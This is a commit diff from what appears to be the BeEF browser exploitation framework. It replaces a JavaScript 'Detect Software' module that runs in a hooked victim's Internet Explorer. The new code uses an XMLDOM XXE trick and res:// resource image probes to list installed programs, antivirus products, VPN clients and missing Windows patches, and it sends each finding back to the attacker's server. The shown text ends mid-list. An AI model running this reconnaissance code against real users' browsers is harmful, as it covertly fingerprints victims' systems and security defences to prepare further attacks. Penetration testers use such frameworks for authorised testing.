Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Replace Detect Software module

Browse Source
This commit is contained in:
Brendan Coles
2017-04-09 17:19:20 +00:00
parent 5f412678c2
commit 6839374199
3 changed files with 692 additions and 157 deletions
Download Patch File Download Diff File Expand all files Collapse all files

832
modules/host/detect_software/command.js
View File

@@ -6,157 +6,689 @@
beef.execute(function() {
var files = [
"Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif",
"NetWaiting/Logon.bmp",
"Windows NT/Pinball/table.bmp",
"InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp",
"Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif",
"Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif",
"Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif",
"Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif",
"Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif",
"eFax Messenger 4.3/Media/ENU/confidential.gif",
"InterActual/InterActual Player/help/images/btm_bckg.gif",
"Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif",
"Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif",
"Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif",
"Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif",
"Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif",
"Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif",
"Mozilla Firefox/res/broken-image.gif",
"Mozilla Thunderbird/res/grabber.gif",
"TechSmith/SnagIt 9/HTML_Content/add-in.gif",
"VMware/VMware Player/help/images/collapse.gif",
"WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif",
"FreeMind/accessories/hide.png",
"HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png",
"Movie Maker/Shared/news.png",
"MySQL/MySQL Tools for 5.0/images/grt/db/column.png",
"Safari/Safari.resources/compass.png",
"ThinkVantage Fingerprint Software/rsc/logon.png",
"Trillian/plugins/GoodNews/icons/logo.png",
"Trillian/users/default/cache/account-AIM-offline.png",
"VideoLAN/VLC/http/images/delete.png",
"Virtual Earth 3D/Data/Atmosphere.png",
"Windows Media Connect 2/wmc_bw120.png",
"Analog Devices/SoundMAX/CPApp.ico",
"AT&T/Communication Manager/desktop.ico",
"ATI Technologies/ATI.ACE/branding.ico",
"Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico",
"CDBurnerXP Pro 3/Resources/cdbxp.ico",
"DivX/divxdotcom.ico",
"Fiddler/IE_Toolbar.ico",
"HP/SwfScan/SwfScan.ico",
"iPhone Configuration Utility/Document-Config.ico",
"Microsoft Device Emulator/1.0/emulator.ico",
"MSN/MSNCoreFiles/Install/msnms.ico",
"OpenVPN/openvpn.ico",
"Paros/paros_logo.ico",
"Adobe/Photoshop 6.0/Help/images/banner.jpg",
"iTunes/iTunes.Resources/genre-blues.jpg",
"Source Insight 3/images/SubBack.jpg",
"Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG",
"Microsoft Office/OFFICE11/REFBAR.ICO",
"Microsoft Office/OFFICE12/REFBAR.ICO",
"Windows Media Player/Network Sharing/wmpnss_color48.jpg",
]
var descriptions = [
"Adobe Reader 9.0",
"WinDVD",
"Windows Pinball",
"Conexant NetWaiting",
"JRE 1.6.0_22",
"Roxio 9.0",
"Windows Weather Gadget",
"Pinnacle",
"Adobe Reader 8.0",
"eFax Manager 4.0",
"Interactual Player",
"Quickbooks",
"JRE 1.5.0_11",
"Flash 8",
"Microsoft CRM",
"Microsoft Live Meeting 8",
"Microsoft Visual Studio 8",
"Mozilla Firefox",
"Mozilla Thunderbird",
"Snagit 9",
"VMware Player",
"Omnipeek Personal",
"Freemind",
"HP Digital Imaging",
"Windows Movie Maker",
"MySQL Tools for 5.0",
"Safari",
"ThinkVantage Fingerprint Software",
"Trillian Plugin GoodNews",
"Trillian",
"VideoLAN VLC",
"Microsoft Virtial Earth 3D",
"Windows Media Connect 2",
"SoundMAX",
"AT&T Communications Manager",
"ATI Technologies ATI.ACE",
"Canon ZoomBrowser",
"CDBurnerXP Pro 3",
"DivX",
"Fiddler",
"HP's SwfScan",
"iPhone Configuration Utility",
"Microsoft Device Emulator",
"MSN",
"OpenVPN",
"Paros",
"Adobe Photoshop 6.0",
"iTunes",
"Source Insight 3",
"Canon CameraWindow",
"Microsoft Office 11",
"Microsoft Office 12",
"Windows Media Player"
]
if (navigator.appName != "Microsoft Internet Explorer") {
result = 'Software detection module only works in IE (so far)';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// Using IE lets test for smb enum
} else {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif";
var pic2 = new Image();
pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg";
if (!("ActiveXObject" in window)) {
beef.debug('[Detect Software] Unspported browser');
beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error());
return false;
}
if (pic1.width == 28 && pic2.width == 28) {
result = 'SMB method of detecting software failed';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// smb enum is working lets look for installed software
} else {
result = '';
var sixtyfourbitvista = 0;
for (var x = 0; x < files.length; x++) {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
} else {
pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
var drive = 'C';
var win_dir = 'WINDOWS';
var program_dirs = ['Program Files', 'Program Files (x86)'];
var xmldom_supported = false;
sixtyfourbitvista = 1;
}
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
}
function detect_folder(path) {
var dtd = 'res://' + path;
var xml = '<?xml version="1.0" ?><!DOCTYPE anything SYSTEM "' + dtd + '">';
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = true;
try {
xmlDoc.loadXML(xml);
return false;
} catch (e) {
return true;
}
}
// Test XMLDOM XXE technique
for (var i = 0; i < program_dirs.length; i++) {
var path = drive + ":\\" + program_dirs[i];
var result = detect_folder(path);
if (result) {
xmldom_supported = true;
break;
}
}
// Detect software using XMLDOM XXE technique
var software = [
['7zip', '7-Zip'],
['Acoustica MP3 Audio Mixer', 'Acoustica MP3 Audio Mixer'],
['Autodesk AutoCAD 2015', 'Autodesk\\AutoCAD 2015'],
['Autodesk AutoCAD 2016', 'Autodesk\\AutoCAD 2016'],
['Adobe Help', 'Adobe\\Adobe Help Viewer'],
['Adobe Professional 7', 'Adobe\\Acrobat 7.0'],
['Adobe Reader 7', 'Adobe\\Reader 7.0\\Reader'],
['Adobe Reader 8', 'Adobe\\Reader 8.0\\Reader'],
['Adobe Reader 9', 'Adobe\\Reader 9.0\\Reader'],
['Adobe Reader 10', 'Adobe\\Reader 10.0\\Reader'],
['Adobe Reader 11', 'Adobe\\Reader 11.0\\Reader'],
['Ahead Nero', 'ahead'],
['AirPcap', 'Riverbed\\AirPcap'],
['Apple Software Update', 'Apple Software Update'],
['Azureus', 'azureus'],
['Baidu', 'baidu'],
['BitComet', 'BitComet'],
['BitSpirit', 'BitSpirit'],
['BioExplorer', 'BioExplorer'],
['Cisco Prime Data Center Network Manager', 'Cisco Systems\\dcm'],
['Citrix', 'Citrix'],
['DbVisualizer', 'DbVisualizer'],
['eMule', 'eMule'],
['eMule', 'easyMule2'],
['Flash MX 2004', 'Macromedia\\Flash MX 2004'],
['Flashget', 'FlashGet'],
['Flashget 3', 'FlashGet Network\\FlashGet 3'],
['FoxIt Reader', 'Foxit Software'],
['FoxIt Reader', 'Foxit Reader'],
['Free Nokia Ringtone Converter', 'Free Nokia Ringtone Converter'],
['Git', 'Git'],
['Gnome Music Player Client', 'Gnome Music Player Client'],
['GnuPG', 'GNU\\GnuPG'],
['Heroku', 'Heroku'],
['HP AutoPass License Server', 'HP\\HP AutoPass License Server'],
['HP TRIM', 'Hewlett-Packard\\HP TRIM'],
['IceWeasel', 'IceWeasel'],
['IncredibleCharts', 'IncredibleCharts'],
['Internet Explorer', 'Internet Explorer'],
['iTunes', 'iTunes'],
['Java JRE 6', 'Java\\jre6'],
['Java JRE 7', 'Java\\jre7'],
['Java JRE 8', 'Java\\jre8'],
['JetBrains dotPeek', 'JetBrains\\dotPeek'],
['Juniper Network Connect 8.1', 'Juniper Networks\\Network Connect 8.1'],
['JXplorer', 'jxplorer'],
['Lexmark Markvision Enterprise', 'Lexmark\\Markvision Enterprise'],
['Magellan MapSend Lite', 'Magellan\MapSend Lite'],
['Microsoft Baseline Security Analyzer 2', 'Microsoft Baseline Security Analyzer 2'],
['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7'],
['Microsoft SQL Server', 'Microsoft SQL Server'],
['Microsoft SQL Server Compact Edition', 'Microsoft SQL Server Compact Edition'],
['Microsoft Virtual PC', 'Microsoft Virtual PC'],
['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8'],
['Microsoft Visual Studio 9', 'Microsoft Visual Studio 9'],
['Microsoft Visual Studio 10', 'Microsoft Visual Studio 10'],
['Microsoft Visual Studio 11', 'Microsoft Visual Studio 11'],
['Microsoft Visual Studio 12', 'Microsoft Visual Studio 12'],
['mIRC', 'mIRC'],
['Mozilla Firefox', 'Mozilla Firefox'],
['MSN Messenger', 'Messenger'],
['NipperStudio', 'NipperStudio'],
['KeePass Password Safe 2', 'KeePass Password Safe 2'],
['NetBeans 8.1', 'NetBeans 8.1'],
['NeuroServer', 'NeuroServer'],
['Nokia PC Suite', 'Nokia\\Connectivity Cable Driver'],
['Notepad Plus Plus', 'Notepad++'],
['Opera', 'Opera'],
['Oracle JavaFX 2.0 Runtime', 'Oracle\\JavaFX 2.0 Runtime'],
['Outlook Express', 'Outlook Express'],
['Paritech Pulse', 'Paritech\\Pulse'],
['PGP Desktop', 'PGP Corporation\\PGP Desktop'],
['Picasa2', 'picasa2'],
['Proxifier', 'Proxifier'],
['QuickTime', 'QuickTime'],
['QLogic SANsurfer', 'QLogic Corporation\SANsurfer'],
['radmin', 'Radmin'],
['Real VNC4', 'RealVNC\\VNC4'],
['RedGate .NET Reflector', 'Red Gate\\.NET Reflector'],
['Resource Hacker', 'Resource Hacker'],
['Safari', 'Safari'],
['SeaMonkey', 'SeaMonkey'],
['SiteKiosk', 'SiteKiosk'],
['Spark', 'Spark'],
['TeamSpeak 3 Client', 'TeamSpeak 3 Client'],
['TinaSoft Easy Cafe Server', 'TinaSoft\\Easy Cafe Server'],
['Trend Micro Deep Security Manager', 'Trend Micro\\Deep Security Manager'],
['TrueCrypt', 'TrueCrypt'],
['TopShare Portfolio Manager v2', 'TopShare Portfolio Manager V2'],
['Samsung USB Drivers for Mobile Phones', 'SAMSUNG\\USB Drivers'],
['Secure CRT', 'SecureCRT'],
['Serv—U', 'RhinoSoft.com\\Serv—U'],
['Skype', 'Skype\\Phone'],
['SoapUI 5.0.0', 'SmartBear\\SoapUI-5.0.0'],
['Thunder', 'Thunder Network\\Thunder'],
['Thunder', 'Thunder Network\\Thunder6'],
['Tencent QQDownload', 'Tencent\\QQDownload'],
['VLC', 'VideoLAN\\VLC'],
['Ultramon', 'ultramon\\ultramondesktop.exe'],
['Unreal Media Server', 'UnrealStreaming\\UMediaServer'],
['uTorrent', 'uTorrent'],
['VMware Workstation', 'vmware\\vmware workstation'],
['VMware Tools', 'VMware\\VMware Tools'],
['VMware Workstation', 'VMware\\VMware Workstation'],
['VirtualBox Guest Additions', 'Oracle\\VirtualBox Guest Additions'],
['Winamp', 'winamp'],
['Windows DVD Maker', 'DVD Maker'],
['Windows Journal', 'Windows Journal'],
['Windows Media Player', 'Windows Media Player'],
['Windows Mail', 'Windows Mail'],
['Windows Movie Maker', 'Movie Maker'],
['Windows NetMeeting', 'NetMeeting'],
['Windows Photo Viewer', 'Windows Photo Viewer'],
['WinHex', 'WinHex'],
['WinRAR', 'WinRAR'],
['WinZip', 'WinZip'],
['Wireshark', 'Wireshark'],
['WinPcap', 'WinPcap'],
['WinSCP', 'WinSCP'],
['XFire', 'xfire'],
['Xming', 'Xming X Server'],
['Yahoo Messenger', 'Yahoo!\\Messenger'],
// AntiVirus
['360Safe', '360\\360Safe'],
['360Safe', '360Safe'],
['A-Squared Anti-Malware', 'A-Squared Anti-Malware'],
['Agnitum Outpost Security Suite Pro', 'Agnitum\\Outpost Security Suite Pro'],
['AhnLab', 'AhnLab'],
['ESET Smart Security', 'ESET\\ESET Smart Security'],
['ESTsoft ALYac Internet Security', 'ESTsoft\\ALYac'],
['AhnLab', 'AhnLab\\Smart Update Utility'],
['AhnLab V3 Internet Security Lite', 'AhnLab\\V3Lite'],
['Avast AntiVirus 4', 'Alwil Software\\Avast4'],
['Avast AntiVirus', 'AVAST Software\\Avast'],
['AVG 2012', 'AVG\\AVG2012'],
['AVG', 'AVG Secure Search'],
['Avira AntiVir Desktop', 'Avira\\AntiVir Desktop'],
['Avira AntiVir Personal Edition', 'Avira\\AntiVir PersonalEdition Classic'],
['BitDefender', 'BitDefender'],
['DrWeb AntiVirus', 'DrWeb'],
['eScan AntiVirus', 'eScan'],
['F-Secure ExploitShield', 'F-Secure\\ExploitShield'],
['F-Secure Internet Security', 'F-Secure Internet Security\\FSPS'],
['F-PROT Antivirus', 'FRISK Software\\F-PROT Antivirus for Windows'],
['Kaspersky Internet Security 2012', 'Kaspersky Lab\\Kaspersky Internet Security 2012'],
['Kaspersky Anti-Virus 2009', 'Kaspersky Lab\\Kaspersky Anti-Virus 2009'],
['Kaspersky Anti-Virus 2010', 'Kaspersky Lab\\Kaspersky Anti-Virus 2010'],
['Kaspersky Anti-Virus 2011', 'Kaspersky Lab\\Kaspersky Anti-Virus 2011'],
['Kaspersky Anti-Virus 2012', 'Kaspersky Lab\\Kaspersky Anti-Virus 2012'],
['Kaspersky Anti-Virus 2013', 'Kaspersky Lab\\Kaspersky Anti-Virus 2013'],
['Kaspersky Anti-Virus 2014', 'Kaspersky Lab\\Kaspersky Anti-Virus 2014'],
['Kaspersky Endpoint Security 8', 'Kaspersky Lab\\Kaspersky Endpoint Security 8 for Windows'],
['Kaspersky Internet Security 2010', 'Kaspersky Lab\\Kaspersky Internet Security 2010'],
['Kaspersky Internet Security 2009', 'Kaspersky Lab\\Kaspersky Internet Security 2009'],
['Kingsoft AntiVirus', 'KingSoft\\kingsoft antivirus'],
['IKARUS anti.virus', 'IKARUS\\anti.virus'],
['Immunet AntiVirus', 'Immunet'],
['JiangMin AntiVirus', 'JiangMin\\AntiVirus'],
['Micropoint AntiVirus', 'Micropoint'],
['Microsoft EMET 4.1', 'EMET 4.1'],
['Microsoft EMET 5.0', 'EMET 5.0'],
['McAfee Total Protection 2011', 'McAfeeMOBK'],
['McAfee Enterprise', 'McAfee\\VirusScan Enterprise'],
['McAfee Security Center', 'McAfee\\MSC'],
['Norman Scan Engine', 'Norman\\Nse'],
['Norton Internet Security', 'Norton Internet Security'],
['Norton AntiVirus', 'Norton AntiVirus'],
['nProtect Anti-Virus Spyware 3.0', 'INCAInternet\\nProtect Anti-Virus Spyware 3.0'],
['PC Tools Antivirus Software', 'PC Tools Antivirus Software'],
['Quick Heal Total Security', 'Quick Heal\\Quick Heal Total Security'],
['Sucop Antivirus', 'Sucop\\SecPlugin'],
['Rising AntiVirus', 'Rising\\RAV'],
['Rising AntiVirus', 'Rising\\RIS'],
['Rising Firewall', 'Rising\\RFW'],
['Sunbelt Software Personal Firewall', 'Sunbelt Software\\Personal Firewall'],
['Sophos Sophos Anti-Virus', 'Sophos\\Sophos Anti-Virus'],
['Sophos Client Firewall', 'Sophos\\Sophos Client Firewall'],
['SUPERAntiSpyware', 'SUPERAntiSpyware'],
['Symantec Endpoint Protection', 'Symantec\\Symantec Endpoint Protection'],
['Symantec Antivirus', 'symantec_client_security\\symantec antivirus'],
['Trend Micro Internet Security', 'Trend Micro\\Internet Security'],
['Trend Micro OfficeScan Client', 'Trend Micro\\OfficeScan Client'],
['VirusBuster', 'VirusBuster'],
['Windows Defender', 'Windows Defender'],
['ZoneAlarm', 'Zone Labs\\ZoneAlarm'],
// Office
['Microsoft Office', 'Microsoft Office\\OFFICE'],
['Microsoft Office 10', 'Microsoft Office\\OFFICE10'],
['Microsoft Office 11', 'Microsoft Office\\OFFICE11'],
['Microsoft Office 12', 'Microsoft Office\\OFFICE12'],
['Microsoft Office 13', 'Microsoft Office\\OFFICE13'],
['Microsoft Office 14', 'Microsoft Office\\OFFICE14'],
['WPS Office', 'Kingsoft\\Kingsoft Office'],
['WPS Office Personal', 'Kingsoft\\WPS Office Personal'],
['WPS Office 2008', 'Kingsoft\\WPS Office 2008'],
['WPS Office 2009', 'Kingsoft\\WPS Office 2009'],
['WPS Office 2010', 'Kingsoft\\WPS Office 2010'],
// Security
['Cain', 'Cain'],
['Echo Mirage', 'Echo Mirage'],
['Fiddler2', 'Fiddler2'],
['L0pht Crack 5', '@stake\\LC5'],
['Immunity Debugger', 'Immunity Inc\\Immunity Debugger'],
['Network Miner v2.1', 'NetworkMiner_2-1'],
['Nmap', 'nmap'],
// VPN
['Checkpoint Endpoint Connect', 'Checkpoint\\Endpoint Connect'],
['Cisco AnyConnect Secure Mobility Client', 'Cisco AnyConnect Secure Mobility Client'],
['Cisco AnyConnect VPN Client', 'Cisco AnyConnect VPN Client'],
['Fortinet FortiClient', 'Fortinet\\FortiClient'],
['OpenVPN', 'OpenVPN']
];
if (xmldom_supported) {
beef.debug('[Detect Software] Enumerating software...');
for (var i = 0; i < program_dirs.length; i++) {
for (var j = 0; j < software.length; j++) {
var path = drive + ":\\" + program_dirs[i] + "\\" + software[j][1];
var result = detect_folder(path);
if (result) {
beef.debug('[Detect Software] Found software: ' + path);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + software[j][0]);
}
}
}
}
// Enumerate patches (Win XP only)
var patches = [
'KB2570947',
'KB2584146',
'KB2585542',
'KB2592799',
'KB2598479',
'KB2603381',
'KB2619339',
'KB2620712',
'KB2631813',
'KB2653956',
'KB2655992',
'KB2659262',
'KB2661637',
'KB2676562',
'KB2686509',
'KB2691442',
'KB2698365',
'KB2705219-v2',
'KB2712808',
'KB2719985',
'KB2723135-v2',
'KB2727528',
'KB2749655',
'KB2757638',
'KB2770660',
'KB2780091',
'KB2802968',
'KB2803821-v2_WM9',
'KB2807986',
'KB2813345',
'KB2820917',
'KB2834886',
'KB2847311',
'KB2850869',
'KB2859537',
'KB2862152',
'KB2862330',
'KB2862335',
'KB2864063',
'KB2868038',
'KB2868626',
'KB2876217',
'KB2876331',
'KB2892075',
'KB2893294',
'KB2898715',
'KB2900986',
'KB2904266',
'KB2909212',
'KB2914368',
'KB2916036',
'KB2922229',
'KB2929961',
'KB2930275',
'KB2934207',
'KB2936068',
'KB2964358',
'KB898461',
'KB923561',
'KB946648',
'KB950762',
'KB950974',
'KB951376-v2',
'KB951978',
'KB952004',
'KB952069_WM9',
'KB952287',
'KB952954',
'KB953155',
'KB954155_WM9',
'KB955759',
'KB956572',
'KB956844',
'KB959426',
'KB960803',
'KB960859',
'KB961118',
'KB968389',
'KB969059',
'KB970430',
'KB970483',
'KB971029',
'KB971657',
'KB972270',
'KB973507',
'KB973540_WM9',
'KB973815',
'KB973869',
'KB973904',
'KB974112',
'KB974318',
'KB974392',
'KB974571',
'KB975025',
'KB975467',
'KB975558_WM8',
'KB975560',
'KB975713',
'KB976323',
'KB977816',
'KB977914',
'KB978338',
'KB978542',
'KB978695_WM9',
'KB978706',
'KB979309',
'KB979482',
'KB979687',
'KB981997',
'KB982132',
'KB982665'
];
if (xmldom_supported) {
beef.debug("[Detect Software] Enumerating installed patches...");
for (var i = 0; i < patches.length; i++) {
var path = drive + ":\\" + win_dir + "\\$NtUninstall" + patches[i] + "$";
var result = detect_folder(path);
if (result) {
beef.debug('[Detect Software] Found patch: ' + path);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + patches[i]);
}
}
}
// Skip software detection using 'res' scheme and EXE/DLL resource images
// if XMLDOM XXE technique worked
if (xmldom_supported) return;
// Detect software using 'res' scheme and EXE/DLL resource images
var dom = beef.dom.createInvisibleIframe();
// Enumerate patches (Win XP only)
var patches = [
["KB2964358", "mshtml.dll/2/2030"], // MS14-021
["KB2936068", "mshtmled.dll/2/2503"], // MS14-018
["KB2864063", "themeui.dll/2/120"], // MS13-071
["KB2859537", "ntkrpamp.exe/2/1"], // MS13-063
["KB2813345", "mstscax.dll/2/101"], // MS13-029
["KB2820917", "winsrv.dll/#2/#512"], // MS13-033
["KB2691442", "shell32.dll/2/130"], // MS12-048
["KB2676562", "ntkrpamp.exe/2/1"], // MS12-034
["KB2506212", "mfc42.dll/#2/#26567"], // MS11-024
["KB2483185", "shell32.dll/2/130"], // MS11-006
["KB2481109", "mstsc.exe/#2/#620"], // MS11-017
["KB2443105", "isign32.dll/2/#101"], // MS10-097
["KB2393802", "ntkrnlpa.exe/2/#1"], // MS11-011
["KB2387149", "mfc40.dll/#2/#26567"], // MS10-074
["KB2296011", "comctl32.dll/#2/#120"], // MS10-081
["KB979687", "wordpad.exe/#2/#131"], // MS10-083
["KB978706", "mspaint.exe/#2/#102"], // MS10-005
["KB977914", "iyuv_32.dll/2/INDEOLOGO"], // MS10-013
["KB973869", "dhtmled.ocx/#2/#1"] // MS09-037
];
beef.debug("[Detect Software] Enumerating installed patches...");
for (var i=0; i<patches.length; i++) {
var img = new Image;
img.title = patches[i][0];
img.src = "res://" + drive + ":\\" + win_dir + "\\$NtUninstall" + patches[i][0] + "$\\" + patches[i][1];
img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + this.title); dom.removeChild(this); }
img.onerror= function() { dom.removeChild(this); }
dom.appendChild(img);
}
// Enumerate software
var software = [
["7zip", "7-Zip\\7zFM.exe/2/2002"],
["Adobe Help", "Adobe\\Adobe Help Viewer\\1.0\\ahv.exe/#2/#132"],
["Baidu", "baidu\\Baidu Hi\\BaiduHi.exe/#2/#152"],
["Cain", "Cain\\UNWISE.EXE/2/106"],
["Echo Mirage", "Echo Mirage\\unins000.exe/2/DISKIMAGE"],
["FoxIt Reader", "Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/257"],
["FoxIt Reader", "Foxit Reader\\Foxit Reader.exe/#2/#484"],
["Internet Explorer", "Internet Explorer\\iedvtool.dll/2/4000"],
["Outlook Express", "Outlook Express\\msoeres.dll/2/1"],
["KeePass Password Safe 2", "KeePass Password Safe 2\\unins000.exe/2/DISKIMAGE"],
["Nokia PC Suite", "Nokia\\Connectivity Cable Driver\\nmwcdcocls.dll/2/131"],
["Notepad Plus Plus", "Notepad++\\uninstall.exe/2/110"],
["OpenVPN", "OpenVPN\\Uninstall.exe/2/110"],
["Oracle JavaFX 2.0 Runtime", "Oracle\\JavaFX 2.0 Runtime\\bin\\eula.dll/2/204"],
["Resource Hacker", "Resource Hacker\\ResHacker.exe/2/128"],
["Samsung USB Drivers for Mobile Phones", "SAMSUNG\\USB Drivers\\Uninstall.exe/2/132"],
["Tencent QQDownload", "Tencent\\QQDownload\\QQDownload.exe/2/132"],
["QuickTime", "QuickTime\\QTinfo.exe/2/101"],
["QuickTime", "QuickTime\\quicktimeplayer.exe/#2/#403"],
["VLC", "VideoLAN\\VLC\\npvlc.dll/2/3"],
["Immunity Debugger", "Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe/2/GOTO"],
["Java JRE 6", "Java\\jre6\\bin\\awt.dll/2/CHECK_BITMAP"],
["Java JRE 7", "Java\\jre7\\bin\\awt.dll/2/CHECK_BITMAP"],
["Java JRE 8", "Java\\jre8\\bin\\awt.dll/2/CHECK_BITMAP"],
["VMware Tools", "VMware\\VMware Tools\\TPVCGatewaydeu.dll/2/30994"],
["VMware Tools", "VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/30995"],
["VMware Workstation", "VMware\\VMware Workstation\\vmplayer.exe/#2/5"],
["VMware Workstation", "VMware\\VMware Workstation\\vmware.exe/#2/#508"],
["VirtualBox Guest Additions", "Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/110"],
["Windows DVD Maker", "DVD Maker\\DVDMaker.exe/2/438"],
["Windows Journal", "Windows Journal\\Journal.exe/2/112"],
["Windows Mail", "Windows Mail\\msoeres.dll/2/1"],
["Windows Movie Maker", "Movie Maker\\wmm2res.dll/2/201"],
["Windows NetMeeting", "NetMeeting\\nmchat.dll/2/207"],
["Windows Photo Viewer", "Windows Photo Viewer\\PhotoViewer.dll/2/#51209"],
["WinRAR", "WinRAR\\WinRAR.exe/#2/#150"],
["Microsoft Virtual PC", "Microsoft Virtual PC\\Virtual PC.exe/#2/150"],
["Wireshark", "Wireshark\\uninstall.exe/2/110"],
// AntiVirus software
["360Safe", '360\\360Safe\\360leakfixer.exe/#2/110'],
["360Safe", '360\\360Safe\\repairleakdll.dll/GIF/154'],
["360Safe", '360Safe\\live.dll/#2/#203'],
["360Safe", '360\\360safe\\360Safe.exe/2/131'],
["ESTsoft ALYac Internet Security", 'ESTsoft\\ALYac\\AYUpdate.aye/2/30994'],
["AhnLab", 'AhnLab\\Smart Update Utility\\SUpdate.exe/2/153'],
["AhnLab V3 Internet Security Lite", 'AhnLab\\V3Lite\\V3LTray.exe/2/132'],
["Avast AntiVirus 4", 'Alwil Software\\Avast4\\ashAvast.exe/2/267'],
["Avast AntiVirus", 'AVAST Software\\Avast\\aswAra.dll/#2/101'],
["AVG 2012", 'AVG\\AVG2012\\avguires.dll/#2/111'],
["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\ccquarc.dll/#2/101'],
["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\setup.dll/#2/132'],
["Avira AntiVir Personal Edition", 'Avira\\AntiVir PersonalEdition Classic\\setup.dll/#2/#132'],
["DrWeb AntiVirus", 'DrWeb\\spideragent.exe/#2/133'],
["Kaspersky Internet Security 2012", 'Kaspersky Lab\\Kaspersky Internet Security 2012\\basegui.ppl/#2'],
["Kaspersky Anti-Virus 2009", 'Kaspersky Lab\\Kaspersky Anti-Virus 2009\\oeas.dll/2/206'],
["Kaspersky Anti-Virus 2010", 'Kaspersky Lab\\Kaspersky Anti-Virus 2010\\shellex.dll/2/103'],
["Kaspersky Internet Security 2010", 'Kaspersky Lab\\Kaspersky Internet Security 2010\\shellex.dll/2/103'],
["Kaspersky Internet Security 2009", 'Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206'],
["Kingsoft AntiVirus", 'KingSoft\\kingsoft antivirus\\kislive.exe/#2/102'],
["Rising AntiVirus", 'Rising\\RAV\\RavUsb.exe/#2/112'],
["Rising AntiVirus", 'Rising\\Ris\\SetUp.exe/2/147'],
["ESET Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/#2/1070'],
["JiangMin AntiVirus", 'JiangMin\\AntiVirus\\VirusBox.exe/#2/128'],
["JiangMin AntiVirus", 'JiangMin\\Install\\KVOL.exe/2/202'],
["Micropoint AntiVirus", 'Micropoint\\mfc90.dll/#2/30994'],
["McAfee Total Protection 2011", 'McAfeeMOBK\\BootStrap.exe/#2/30994'],
["McAfee Enterprise", 'McAfee\\VirusScan Enterprise\\graphics.dll/2/202'],
["McAfee Security Center", 'McAfee\\MSC\\mclgview.exe/2/129'],
["Norton Internet Security 16.0.0.125", 'Norton Internet Security\\Engine\\16.0.0.125\\SymSHAx9.dll/2/102'],
["Norton Internet Security 16.5.0.135", 'Norton Internet Security\\Engine\\16.5.0.135\\SymSHAx9.dll/2/102'],
["Norton AntiVirus 17.5.0.127", 'Norton AntiVirus\\MUI\\17.5.0.127\\images\\cssbase.dll/2/SCANTASKWZ_SCAN_ITEM_LIST.BMP'],
["NOD32 Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/2/1070'],
["Trend Micro Internet Security", 'Trend Micro\\Internet Security\\UfSeAgnt.exe/2/30994'],
["Trend Micro OfficeScan Client", 'Trend Micro\\OfficeScan Client\\PcNTMon.exe/2/30994'],
["Sucop Antivirus", 'Sucop\\SecPlugin\\SecPlugin.dll/#2/211'],
["Sophos Client Firewall", 'Sophos\\Sophos Client Firewall\\logo_rc.dll/2/114'],
["Symantec Endpoint Protection", 'Symantec\\LiveUpdate\\AUPDATE.exe/2/129'],
["ZoneAlarm", 'Zone Labs\\ZoneAlarm\\alert.zap/2/176'],
// The following signatures were taken from:
// https://www.alienvault.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi
["Microsoft Office 97", "Microsoft Office\\OFFICE\\BINDER.EXE/16/1"],
["Microsoft Office 2000", "Microsoft Office\\OFFICE\\WINWORD.EXE/16/1"],
["Microsoft Office XP", "Microsoft Office\\OFFICE10\\WINWORD.EXE/16/1"],
["Microsoft Office 2003", "Microsoft Office\\OFFICE11\\WINWORD.EXE/16/1"],
["Microsoft Office 2007", "Microsoft Office\\OFFICE12\\WINWORD.EXE/16/1"],
["Microsoft Office 2010", "Microsoft Office\\OFFICE14\\WINWORD.EXE/16/1"],
["WPS Office Personal", "Kingsoft\\WPS Office Personal\\utility\\repairinst.exe/16/1"],
["WPS Office 2008", "Kingsoft\\WPS Office 2008\\utility\\repairinst.exe/16/1"],
